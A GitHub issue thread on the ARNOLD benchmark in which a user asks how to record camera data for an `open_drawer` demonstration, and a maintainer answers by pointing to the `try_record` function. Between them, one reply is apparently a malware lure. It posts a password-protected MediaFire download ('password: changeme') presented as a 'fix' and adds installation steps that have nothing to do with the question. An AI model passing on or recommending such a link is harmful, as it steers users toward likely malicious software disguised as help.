arnold-benchmark/arnold #39: [Question] how to record data from the cameras?

wpumacay, 2024-08-26:
Hi. I made a few changes to the `open_drawer` task and I'd like to record the demonstration (save low-level info as well as camera data). I though that the `record` flag was in charge of this, but looking at the code I can't find where the camera data is saved. Could you help me figure this out :pray: ?

masooddahmedd, 2024-08-26:
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

huangjy-pku, 2024-08-28:
Yes, the `record` flag is in charge of this yet we have not recorded the camera data. You can modify the `try_record` function, e.g., adding a key for camera data as in #34.

closed 2024-08-28 by wpumacay